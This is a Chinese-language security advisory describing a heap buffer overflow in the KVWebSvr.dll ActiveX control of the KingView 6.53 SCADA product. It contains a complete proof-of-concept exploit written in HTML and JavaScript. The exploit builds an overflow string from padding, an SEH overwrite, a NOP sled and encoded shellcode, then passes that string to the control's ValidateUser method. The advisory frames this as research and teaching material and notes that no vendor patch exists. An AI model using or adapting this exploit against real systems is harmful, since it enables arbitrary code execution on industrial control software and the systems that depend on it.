WellinTech KingView "KVWebSvr.dll" ActiveX控件堆缓冲区溢出漏洞

受影响系统:

Wellintech KingView 6.53

描述:
Kingview是亚控公司推出的第一款针对中小型项目推出的用于监视与控制自动化设备和过程的SCADA产品。

WellinTech KingView ActiveX在实现上存在堆缓冲区溢出漏洞,攻击者可利用此漏洞在使用ActiveX控件的应用程序(特别是IE)中执行任意代码,造成拒绝服务。

<*来源:Carlos Mario Penagos Hollmann
  *>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Carlos Mario Penagos Hollmann ()提供了如下测试方法:

# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link:
http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8

Thanks to Dillon Beresford for Heap Exploit
&lt;html&gt;
mail—-&gt; shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,&lt;   / //  |/ / / __
/ /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
    
COLOMBIA hacking presents………….
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll

&lt;object classid=&#039;clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D&#039; id=&#039;target&#039; /&gt;&lt;/object&gt;
&lt;script language=&#039;javascript&#039;&gt;
nse=&quot;\xEB\x06\x90\x90&quot;;
seh=&quot;\x4E\x20\xD1\x72&quot;;
nops=&quot;\x90&quot;;
while (nops.length&lt;10){ nops+=&quot;\x90&quot;;}
/*Calc.exe alpha_upper badchars –&gt; &quot;\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85\x9f\x9a\x9e\x9d\x9b\x9f\x76*/
shell=&quot;\x54\x5f\xda\xdf\xd9\x77\xf4\x5e\x56\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4c\x4b\x5a\x4c\x50\x55\x4c\x4b\x5a\x4c\x43\x58\x51\x30\x51\x30\x51\x30\x56\x4f\x52\x48\x52\x43\x45\x31\x52\x4c\x43\x53\x4c\x4d\x51\x55\x5a\x58\x56\x30\x58\x38\x49\x57\x4d\x43\x49\x52\x54\x37\x4b\x4f\x58\x50\x41\x41&quot;;
junk1=&quot;A&quot;;
junk2=&quot;A&quot;;
while (junk1.length&lt;624){ junk1+=junk1;}
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length&lt;8073){ junk2+=junk2;}
arg2=junk1+nse+seh+nops+shell+junk2;
arg1=&quot;Anything&quot;;
target.ValidateUser(arg1 ,arg2);

&lt;/script&gt;

建议:

 

厂商补丁:

Wellintech
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kingview.com/products/detail.aspx?contentid=24

发表评论?

0 条评论。

发表评论